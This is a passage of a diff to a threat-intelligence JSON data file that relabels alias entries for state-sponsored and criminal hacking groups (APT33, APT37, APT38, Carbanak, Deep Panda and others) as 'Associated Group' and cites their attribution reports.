Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims.[[FireEye APT32 May 2017](https://app.tidalcyber.com/references/b72d017b-a70f-4003-b3d9-90d79aca812d)][[Volexity OceanLotus Nov 2017](https://app.tidalcyber.com/references/ed9f5545-377f-4a12-92e4-c0439cc5b037)][[ESET OceanLotus](https://app.tidalcyber.com/references/a7bcbaca-10c1-403a-9eb5-f111af1cbf6a)]", @@ -1861,7 +1861,7 @@ } ], "uuid": "51ec6111-08b2-4294-a3a6-6d3f04161b62", - "value": "HOLMIUM" + "value": "HOLMIUM - Associated Group" }, { "description": "[[Symantec Elfin Mar 2019](https://app.tidalcyber.com/references/55671ede-f309-4924-a1b4-3d597517b27e)]", @@ -1875,7 +1875,7 @@ } ], "uuid": "b757d8cd-0b22-4604-81a6-1cd3dd53084c", - "value": "Elfin" + "value": "Elfin - Associated Group" }, { "description": "[[Microsoft Peach Sandstorm September 14 2023](/references/98a631f4-4b95-4159-b311-dee1216ec208)]", @@ -1891,7 +1891,7 @@ } ], "uuid": "5d178cb0-a072-4b2f-9c28-13642fb30c03", - "value": "Peach Sandstorm" + "value": "Peach Sandstorm - Associated Group" }, { "description": "[APT33](https://app.tidalcyber.com/groups/99bbbe25-45af-492f-a7ff-7cbc57828bac) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. [[FireEye APT33 Sept 2017](https://app.tidalcyber.com/references/70610469-db0d-45ab-a790-6e56309a39ec)] [[FireEye APT33 Webinar Sept 2017](https://app.tidalcyber.com/references/9b378592-5737-403d-8a07-27077f5b2d61)]", @@ -1949,7 +1949,7 @@ } ], "uuid": "81c1b801-4fc4-4602-89c0-91f59afd3f67", - "value": "InkySquid" + "value": "InkySquid - Associated Group" }, { "description": "[[Securelist ScarCruft Jun 2016](https://app.tidalcyber.com/references/04961952-9bac-48f3-adc7-40a3a2bcee84)][[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)][[Securelist ScarCruft May 2019](https://app.tidalcyber.com/references/2dd5b872-a4ab-4b77-8457-a3d947298fc0)]", @@ -1963,7 +1963,7 @@ } ], "uuid": "83962063-25d5-498b-8d40-168df6e8e85a", - "value": "ScarCruft" + "value": "ScarCruft - Associated Group" }, { "description": "[[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]", @@ -1977,7 +1977,7 @@ } ], "uuid": "0e5a5a21-ca65-4b92-91d8-c6ffe8d39dd8", - "value": "Reaper" + "value": "Reaper - Associated Group" }, { "description": "[[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]", @@ -1991,7 +1991,7 @@ } ], "uuid": "1cbfa64f-c394-402f-9c1f-d66e33b2b2f7", - "value": "Group123" + "value": "Group123 - Associated Group" }, { "description": "[[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]", @@ -2005,7 +2005,7 @@ } ], "uuid": "66d651c2-e379-45a4-a7eb-4e838f8b2819", - "value": "TEMP.Reaper" + "value": "TEMP.Reaper - Associated Group" }, { "description": "[[CrowdStrike Richochet Chollima September 2021](https://app.tidalcyber.com/references/69a23467-c55c-43a3-951d-c208e6ead6f7)]", @@ -2019,7 +2019,7 @@ } ], "uuid": "62533eef-3762-5920-b3da-392fcd2d4d02", - "value": "Ricochet Chollima" + "value": "Ricochet Chollima - Associated Group" }, { "description": "[APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) has also been linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018.[[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)][[Securelist ScarCruft Jun 2016](https://app.tidalcyber.com/references/04961952-9bac-48f3-adc7-40a3a2bcee84)][[Talos Group123](https://app.tidalcyber.com/references/bf8b2bf0-cca3-437b-a640-715f9cc945f7)]\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups.", @@ -2097,7 +2097,7 @@ } ], "uuid": "dd64bbe7-4d35-4622-a92f-23255765c525", - "value": "Stardust Chollima" + "value": "Stardust Chollima - Associated Group" }, { "description": "[[SecureWorks NICKEL GLADSTONE profile Sept 2021](https://app.tidalcyber.com/references/c78a8379-04a4-4558-820d-831ad4f267fd)]", @@ -2111,7 +2111,7 @@ } ], "uuid": "25b6512f-c60e-480f-81a0-c2ec4ba31ac8", - "value": "NICKEL GLADSTONE" + "value": "NICKEL GLADSTONE - Associated Group" }, { "description": "[[CISA AA20-239A BeagleBoyz August 2020](https://app.tidalcyber.com/references/a8a2e3f2-3967-4e82-a36a-2436c654fb3f)]", @@ -2125,7 +2125,7 @@ } ], "uuid": "b8b8afb0-04b2-41b3-b756-d652b65c530d", - "value": "BeagleBoyz" + "value": "BeagleBoyz - Associated Group" }, { "description": "[[Kaspersky Lazarus Under The Hood Blog 2017](https://app.tidalcyber.com/references/a1e1ab6a-8db0-4593-95ec-78784607dfa0)]", @@ -2139,7 +2139,7 @@ } ], "uuid": "cf196249-7d25-4d5a-b2c9-2b34f045feba", - "value": "Bluenoroff" + "value": "Bluenoroff - Associated Group" }, { "description": "[APT38](https://app.tidalcyber.com/groups/dfbce236-735c-436d-b433-933bd6eae17b) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.[[CISA AA20-239A BeagleBoyz August 2020](https://app.tidalcyber.com/references/a8a2e3f2-3967-4e82-a36a-2436c654fb3f)] Active since at least 2014, [APT38](https://app.tidalcyber.com/groups/dfbce236-735c-436d-b433-933bd6eae17b) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://app.tidalcyber.com/groups/dfbce236-735c-436d-b433-933bd6eae17b) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.[[CISA AA20-239A BeagleBoyz August 2020](https://app.tidalcyber.com/references/a8a2e3f2-3967-4e82-a36a-2436c654fb3f)][[FireEye APT38 Oct 2018](https://app.tidalcyber.com/references/7c916329-af56-4723-820c-ef932a6e3409)][[DOJ North Korea Indictment Feb 2021](https://app.tidalcyber.com/references/d702653f-a9da-4a36-8f84-97caeb445266)][[Kaspersky Lazarus Under The Hood Blog 2017](https://app.tidalcyber.com/references/a1e1ab6a-8db0-4593-95ec-78784607dfa0)]\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups.", @@ -2240,7 +2240,7 @@ } ], "uuid": "6ca4e51d-aa35-4a77-b3ba-7eb8634808f7", - "value": "ITG07" + "value": "ITG07 - Associated Group" }, { "description": "Activities associated with APT39 largely align with a group publicly referred to as Chafer.[[FireEye APT39 Jan 2019](https://app.tidalcyber.com/references/ba366cfc-cc04-41a5-903b-a7bb73136bc3)][[Symantec Chafer Dec 2015](https://app.tidalcyber.com/references/0a6166a3-5649-4117-97f4-7b8b5b559929)][[Dark Reading APT39 JAN 2019](https://app.tidalcyber.com/references/b310dfa4-f4ee-4a0c-82af-b0fdef1a1f58)][[FBI FLASH APT39 September 2020](https://app.tidalcyber.com/references/76869199-e9fa-41b4-b045-41015e6daaec)][[Dept. of Treasury Iran Sanctions September 2020](https://app.tidalcyber.com/references/0c8ff80a-6b1d-4212-aa40-99aeef04ce05)][[DOJ Iran Indictments September 2020](https://app.tidalcyber.com/references/f30a77dd-d1d0-41b8-b82a-461dd6cd126f)]", @@ -2254,7 +2254,7 @@ } ], "uuid": "d9944d22-b092-4f28-a27d-328d77ad7790", - "value": "Chafer" + "value": "Chafer - Associated Group" }, { "description": "[[Crowdstrike GTR2020 Mar 2020](https://app.tidalcyber.com/references/a2325ace-e5a1-458d-80c1-5037bd7fa727)]", @@ -2268,7 +2268,7 @@ } ], "uuid": "94ad9c24-d673-4f4c-8d3d-eb57a3d6aa6a", - "value": "Remix Kitten" + "value": "Remix Kitten - Associated Group" }, { "description": "[APT39](https://app.tidalcyber.com/groups/a57b52c7-9f64-4ffe-a7c3-0de738fb2af1) is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://app.tidalcyber.com/groups/a57b52c7-9f64-4ffe-a7c3-0de738fb2af1) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.[[FireEye APT39 Jan 2019](https://app.tidalcyber.com/references/ba366cfc-cc04-41a5-903b-a7bb73136bc3)][[Symantec Chafer Dec 2015](https://app.tidalcyber.com/references/0a6166a3-5649-4117-97f4-7b8b5b559929)][[FBI FLASH APT39 September 2020](https://app.tidalcyber.com/references/76869199-e9fa-41b4-b045-41015e6daaec)][[Dept. of Treasury Iran Sanctions September 2020](https://app.tidalcyber.com/references/0c8ff80a-6b1d-4212-aa40-99aeef04ce05)][[DOJ Iran Indictments September 2020](https://app.tidalcyber.com/references/f30a77dd-d1d0-41b8-b82a-461dd6cd126f)]", @@ -2326,7 +2326,7 @@ } ], "uuid": "160cc195-b382-4bb1-807c-2e1592fbe105", - "value": "Wicked Panda" + "value": "Wicked Panda - Associated Group" }, { "description": "[APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b).[[FireEye APT41 Aug 2019](https://app.tidalcyber.com/references/20f8e252-0a95-4ebd-857c-d05b0cde0904)][[Group IB APT 41 June 2021](https://app.tidalcyber.com/references/a2bf43a0-c7da-4cb9-8f9a-b34fac92b625)]\n", @@ -2420,7 +2420,7 @@ } ], "uuid": "3a48eb6e-2b44-4004-af10-459f5ee4352a", - "value": "Blind Eagle" + "value": "Blind Eagle - Associated Group" }, { "description": "[APT-C-36](https://app.tidalcyber.com/groups/153c14a6-31b7-44f2-892e-6d9fdc152267) is a suspected South America espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing.[[QiAnXin APT-C-36 Feb2019](https://app.tidalcyber.com/references/cae075ea-42cb-4695-ac66-9187241393d1)]", @@ -2478,7 +2478,7 @@ } ], "uuid": "a975effb-1b65-4dd5-85ba-b0d12d94b7a8", - "value": "Group 72" + "value": "Group 72 - Associated Group" }, { "description": "[Axiom](https://app.tidalcyber.com/groups/90f4d3f9-3fe3-4a64-8dc1-172c6d037dca) is a suspected Chinese cyber espionage group that has targeted the aerospace, defense, government, manufacturing, and media sectors since at least 2008. Some reporting suggests a degree of overlap between [Axiom](https://app.tidalcyber.com/groups/90f4d3f9-3fe3-4a64-8dc1-172c6d037dca) and [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b) but the two groups appear to be distinct based on differences in reporting on TTPs and targeting.[[Kaspersky Winnti April 2013](https://app.tidalcyber.com/references/2d4834b9-61c4-478e-919a-317d97cd2c36)][[Kaspersky Winnti June 2015](https://app.tidalcyber.com/references/86504950-0f4f-42bc-b003-24f60ae97c99)][[Novetta Winnti April 2015](https://app.tidalcyber.com/references/cbe8373b-f14b-4890-99fd-35ffd7090dea)]", @@ -2615,7 +2615,7 @@ } ], "uuid": "fd4b4e28-6f0c-43a5-b42d-6d2488d1ff93", - "value": "T-APT-17" + "value": "T-APT-17 - Associated Group" }, { "description": "[BITTER](https://app.tidalcyber.com/groups/3a02aa1b-851a-43e1-b83b-58037f3c7025) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://app.tidalcyber.com/groups/3a02aa1b-851a-43e1-b83b-58037f3c7025) has primarily targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.[[Cisco Talos Bitter Bangladesh May 2022](https://app.tidalcyber.com/references/097583ed-03b0-41cd-bf85-66d473f46439)][[Forcepoint BITTER Pakistan Oct 2016](https://app.tidalcyber.com/references/9fc54fb0-b7d9-49dc-b6dd-ab4cb2cd34fa)]", @@ -2801,7 +2801,7 @@ } ], "uuid": "25cec21f-c276-4d0c-adef-6313bd752e07", - "value": "Palmerworm" + "value": "Palmerworm - Associated Group" }, { "description": "[[U.S. CISA BlackTech September 27 2023](/references/309bfb48-76d1-4ae9-9c6a-30b54658133c)]", @@ -2817,7 +2817,7 @@ } ], "uuid": "e3baf8a3-d4bb-4ef0-add7-39bc238b0c12", - "value": "Temp.Overboard" + "value": "Temp.Overboard - Associated Group" }, { "description": "[[U.S. CISA BlackTech September 27 2023](/references/309bfb48-76d1-4ae9-9c6a-30b54658133c)]", @@ -2833,7 +2833,7 @@ } ], "uuid": "c1769626-608d-42b4-b0dc-67520181e8a6", - "value": "Circuit Panda" + "value": "Circuit Panda - Associated Group" }, { "description": "[[U.S. CISA BlackTech September 27 2023](/references/309bfb48-76d1-4ae9-9c6a-30b54658133c)]", @@ -2849,7 +2849,7 @@ } ], "uuid": "4e472ebd-7685-409e-a41d-b9034d04583f", - "value": "Radio Panda" + "value": "Radio Panda - Associated Group" }, { "description": "[BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia--particularly Taiwan, Japan, and Hong Kong--and the US since at least 2013. [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.[[TrendMicro BlackTech June 2017](https://app.tidalcyber.com/references/abb9cb19-d30e-4048-b106-eb29a6dad7fc)][[Symantec Palmerworm Sep 2020](https://app.tidalcyber.com/references/84ecd475-8d3f-4e7c-afa8-2dff6078bed5)][[Reuters Taiwan BlackTech August 2020](https://app.tidalcyber.com/references/77293f88-e336-4786-b042-7f0080bbff32)]", @@ -2928,7 +2928,7 @@ } ], "uuid": "84db787e-f59b-4318-be71-17bf3c55effa", - "value": "REDBALDKNIGHT" + "value": "REDBALDKNIGHT - Associated Group" }, { "description": "[[Trend Micro Daserf Nov 2017](https://app.tidalcyber.com/references/4ca0e6a9-8c20-49a0-957a-7108083a8a29)][[Symantec Tick Apr 2016](https://app.tidalcyber.com/references/3e29cacc-2c05-4f35-8dd1-948f8aee6713)][[Trend Micro Tick November 2019](https://app.tidalcyber.com/references/93adbf0d-5f5e-498e-aca1-ed3eb11561e7)]", @@ -2942,7 +2942,7 @@ } ], "uuid": "19c5a727-c2a1-411d-ad3c-b96b62dd72ea", - "value": "Tick" + "value": "Tick - Associated Group" }, { "description": "[BRONZE BUTLER](https://app.tidalcyber.com/groups/5825a840-5577-4ffc-a08d-3f48d64395cb) is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.[[Trend Micro Daserf Nov 2017](https://app.tidalcyber.com/references/4ca0e6a9-8c20-49a0-957a-7108083a8a29)][[Secureworks BRONZE BUTLER Oct 2017](https://app.tidalcyber.com/references/c62d8d1a-cd1b-4b39-95b6-68f3f063dacf)][[Trend Micro Tick November 2019](https://app.tidalcyber.com/references/93adbf0d-5f5e-498e-aca1-ed3eb11561e7)]", @@ -3000,7 +3000,7 @@ } ], "uuid": "060c0532-780d-4e42-9023-2ac385f369d7", - "value": "Anunak" + "value": "Anunak - Associated Group" }, { "description": "[Carbanak](https://app.tidalcyber.com/groups/72d9bea7-9ca1-43e6-8702-2fb7fb1355de) is a cybercriminal group that has used [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) malware to target financial institutions since at least 2013. [Carbanak](https://app.tidalcyber.com/groups/72d9bea7-9ca1-43e6-8702-2fb7fb1355de) may be linked to groups tracked separately as [Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) and [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) that have also used [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) malware.[[Kaspersky Carbanak](https://app.tidalcyber.com/references/2f7e77db-fe39-4004-9945-3c8943708494)][[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)][[Europol Cobalt Mar 2018](https://app.tidalcyber.com/references/f9d1f2ab-9e75-48ce-bcdf-b7119687feef)][[Secureworks GOLD NIAGARA Threat Profile](https://app.tidalcyber.com/references/b11276cb-f6dd-4e91-90cd-9c287fb3e6b1)][[Secureworks GOLD KINGSWOOD Threat Profile](https://app.tidalcyber.com/references/36035bbb-1609-4461-be27-ef4a920b814c)]", @@ -3085,7 +3085,7 @@ } ], "uuid": "91b42715-7646-497a-a146-50bdffad8f71", - "value": "Threat Group 2889" + "value": "Threat Group 2889 - Associated Group" }, { "description": "[[Dell Threat Group 2889](https://app.tidalcyber.com/references/de7003cb-5127-4fd7-9475-d69e0d7f5cc8)]", @@ -3099,7 +3099,7 @@ } ], "uuid": "18e47f6e-b3e3-40e9-8cc1-589f3b8dca36", - "value": "TG-2889" + "value": "TG-2889 - Associated Group" }, { "description": "[Cleaver](https://app.tidalcyber.com/groups/c8cc6ce8-d421-42e6-a6eb-2ea9d2d9ab07) is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. [[Cylance Cleaver](https://app.tidalcyber.com/references/f0b45225-3ec3-406f-bd74-87f24003761b)] Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). [[Dell Threat Group 2889](https://app.tidalcyber.com/references/de7003cb-5127-4fd7-9475-d69e0d7f5cc8)]", @@ -3168,7 +3168,7 @@ } ], "uuid": "14e60fe8-a70e-4b49-9e0c-d0417e2a8a2e", - "value": "GOLD KINGSWOOD" + "value": "GOLD KINGSWOOD - Associated Group" }, { "description": "[[Talos Cobalt Group July 2018](https://app.tidalcyber.com/references/7cdfd0d1-f7e6-4625-91ff-f87f46f95864)] [[Crowdstrike Global Threat Report Feb 2018](https://app.tidalcyber.com/references/6c1ace5b-66b2-4c56-9301-822aad2c3c16)][[Morphisec Cobalt Gang Oct 2018](https://app.tidalcyber.com/references/0a0bdd4b-a680-4a38-967d-3ad92f04d619)]", @@ -3182,7 +3182,7 @@ } ], "uuid": "497264f0-60ec-4515-b123-4d17701d4bd8", - "value": "Cobalt Gang" + "value": "Cobalt Gang - Associated Group" }, { "description": "[[Crowdstrike Global Threat Report Feb 2018](https://app.tidalcyber.com/references/6c1ace5b-66b2-4c56-9301-822aad2c3c16)]", @@ -3196,7 +3196,7 @@ } ], "uuid": "5d356315-296c-4c79-b2e4-d4dcdcf59551", - "value": "Cobalt Spider" + "value": "Cobalt Spider - Associated Group" }, { "description": "[Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. [Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims.[[Talos Cobalt Group July 2018](https://app.tidalcyber.com/references/7cdfd0d1-f7e6-4625-91ff-f87f46f95864)][[PTSecurity Cobalt Group Aug 2017](https://app.tidalcyber.com/references/f4ce1b4d-4f01-4083-8bc6-931cbac9ac38)][[PTSecurity Cobalt Dec 2016](https://app.tidalcyber.com/references/2de4d38f-c99d-4149-89e6-0349a4902aa2)][[Group IB Cobalt Aug 2017](https://app.tidalcyber.com/references/2d9ef1de-2ee6-4500-a87d-b55f83e65900)][[Proofpoint Cobalt June 2017](https://app.tidalcyber.com/references/c4922659-88b2-4311-9c9b-dc9b383d746a)][[RiskIQ Cobalt Nov 2017](https://app.tidalcyber.com/references/ebf961c5-bd68-42f3-8fd3-000946c7ae9c)][[RiskIQ Cobalt Jan 2018](https://app.tidalcyber.com/references/7d48b679-d44d-466e-b12b-16f0f9858d15)] Reporting indicates there may be links between [Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) and both the malware [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) and the group [Carbanak](https://app.tidalcyber.com/groups/72d9bea7-9ca1-43e6-8702-2fb7fb1355de).[[Europol Cobalt Mar 2018](https://app.tidalcyber.com/references/f9d1f2ab-9e75-48ce-bcdf-b7119687feef)]", @@ -3263,7 +3263,7 @@ } ], "uuid": "f223d10c-171d-4aa7-ab2c-7ff2acaf88f1", - "value": "Confucius APT" + "value": "Confucius APT - Associated Group" }, { "description": "[Confucius](https://app.tidalcyber.com/groups/d0f29889-7a9c-44d8-abdc-480b371f7b2b) is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between [Confucius](https://app.tidalcyber.com/groups/d0f29889-7a9c-44d8-abdc-480b371f7b2b) and [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a), particularly in their respective custom malware code and targets.[[TrendMicro Confucius APT Feb 2018](https://app.tidalcyber.com/references/d1d5a708-75cb-4d41-b2a3-d035a14ac956)][[TrendMicro Confucius APT Aug 2021](https://app.tidalcyber.com/references/5c16aae9-d253-463b-8bbc-f14402ce77e4)][[Uptycs Confucius APT Jan 2021](https://app.tidalcyber.com/references/d74f2c25-cd53-4587-b087-7ba0b8427dc4)]", @@ -3451,7 +3451,7 @@ } ], "uuid": "c110892f-9eae-4ffe-bf16-55437d814f3a", - "value": "DUBNIUM" + "value": "DUBNIUM - Associated Group" }, { "description": "[Darkhotel](https://app.tidalcyber.com/groups/efa1d922-8f48-43a6-89fe-237e1f3812c8) is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group's name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. [Darkhotel](https://app.tidalcyber.com/groups/efa1d922-8f48-43a6-89fe-237e1f3812c8) has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks.[[Kaspersky Darkhotel](https://app.tidalcyber.com/references/3247c03a-a57c-4945-9b85-72a70719e1cd)][[Securelist Darkhotel Aug 2015](https://app.tidalcyber.com/references/5a45be49-f5f1-4d5b-b7da-0a2f38194ec1)][[Microsoft Digital Defense FY20 Sept 2020](https://app.tidalcyber.com/references/cdf74af5-ed71-4dfd-bc49-0ccfa40b65ea)]", @@ -3544,7 +3544,7 @@ } ], "uuid": "cf629343-dce6-40db-b07e-e9667c7fe3a1", - "value": "WebMasters" + "value": "WebMasters - Associated Group" }, { "description": "[[RSA Shell Crew](https://app.tidalcyber.com/references/6872a6d3-c4ab-40cf-82b7-5c5c8e077189)]", @@ -3558,7 +3558,7 @@ } ], "uuid": "07485906-ee31-42d3-aa65-60f8c8715978", - "value": "PinkPanther" + "value": "PinkPanther - Associated Group" }, { "description": "[[RSA Shell Crew](https://app.tidalcyber.com/references/6872a6d3-c4ab-40cf-82b7-5c5c8e077189)]", @@ -3572,7 +3572,7 @@ } ], "uuid": "d2cec0e9-74c2-4095-a6d5-9996d8ad24a0", - "value": "Shell Crew" + "value": "Shell Crew - Associated Group" }, { "description": "[[RSA Shell Crew](https://app.tidalcyber.com/references/6872a6d3-c4ab-40cf-82b7-5c5c8e077189)]", @@ -3586,7 +3586,7 @@ } ], "uuid": "b7f392bf-d2bb-4074-bcfd-68a459d04a7a", - "value": "KungFu Kittens" + "value": "KungFu Kittens - Associated Group" }, { "description": "[[Symantec Black Vine](https://app.tidalcyber.com/references/0b7745ce-04c0-41d9-a440-df9084a45d09)]", @@ -3600,7 +3600,7 @@ } ], "uuid": "55740e18-3c5e-4481-95ec-e2cc8810d3ee", - "value": "Black Vine" + "value": "Black Vine - Associated Group" }, { "description": "[Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. [[Alperovitch 2014](https://app.tidalcyber.com/references/72e19be9-35dd-4199-bc07-bd9d0c664df6)] The intrusion into healthcare company Anthem has been attributed to [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b). [[ThreatConnect Anthem](https://app.tidalcyber.com/references/61ecd0b4-6cac-4d9f-8e8c-3d488fef6fec)] This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. [[RSA Shell Crew](https://app.tidalcyber.com/references/6872a6d3-c4ab-40cf-82b7-5c5c8e077189)] [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion. [[Symantec Black Vine](https://app.tidalcyber.com/references/0b7745ce-04c0-41d9-a440-df9084a45d09)] Some analysts track [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) and [APT19](https://app.tidalcyber.com/groups/713e2963-fbf4-406f-a8cf-6a4489d90439) as the same group, but it is unclear from open source information if the groups are the same. [[ICIT China's Espionage Jul 2016](https://app.tidalcyber.com/references/1a824860-6978-454d-963a-a56414a4312b)]", @@ -3673,7 +3673,7 @@ } ], "uuid": "3209f44c-6706-4886-aee8-91f2ab14b10d", - "value": "Berserk Bear" + "value": "Berserk Bear - Associated Group" }, { "description": "[[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)][[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)][[DOJ Russia Targeting Critical Infrastructure March 2022](https://app.tidalcyber.com/references/768a0ec6-b767-4044-acad-82834508640f)][[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]", @@ -3687,7 +3687,7 @@ } ], "uuid": "8e8f69f2-0bc1-4090-965b-1ee0e1e3cca9", - "value": "Crouching Yeti" + "value": "Crouching Yeti - Associated Group" }, { "description": "[[Symantec Dragonfly](https://app.tidalcyber.com/references/9514c5cd-2ed6-4dbf-aa9e-1c425e969226)][[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)][[Secureworks MCMD July 2019](https://app.tidalcyber.com/references/f7364cfc-5a3b-4538-80d0-cae65f3c6592)][[Secureworks Karagany July 2019](https://app.tidalcyber.com/references/61c05edf-24aa-4399-8cdf-01d27f6595a1)][[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)][[DOJ Russia Targeting Critical Infrastructure March 2022](https://app.tidalcyber.com/references/768a0ec6-b767-4044-acad-82834508640f)][[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]", @@ -3701,7 +3701,7 @@ } ], "uuid": "acc95a06-1553-4f73-a582-f40dc1187b58", - "value": "Energetic Bear" + "value": "Energetic Bear - Associated Group" }, { "description": "[[Mandiant Ukraine Cyber Threats January 2022](https://app.tidalcyber.com/references/6f53117f-2e94-4981-be61-c3da4b783ce2)][[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)]", @@ -3715,7 +3715,7 @@ } ], "uuid": "2e1aa161-b0c0-431a-b974-735bb781c05a", - "value": "TEMP.Isotope" + "value": "TEMP.Isotope - Associated Group" }, { "description": "[[Dragos DYMALLOY ](https://app.tidalcyber.com/references/d2785c6e-e0d1-4e90-a2d5-2c302176d5d3)][[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]", @@ -3729,7 +3729,7 @@ } ], "uuid": "a9bba2d1-7fc8-43a0-8442-a12cde99329e", - "value": "DYMALLOY" + "value": "DYMALLOY - Associated Group" }, { "description": "[[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)][[UK GOV FSB Factsheet April 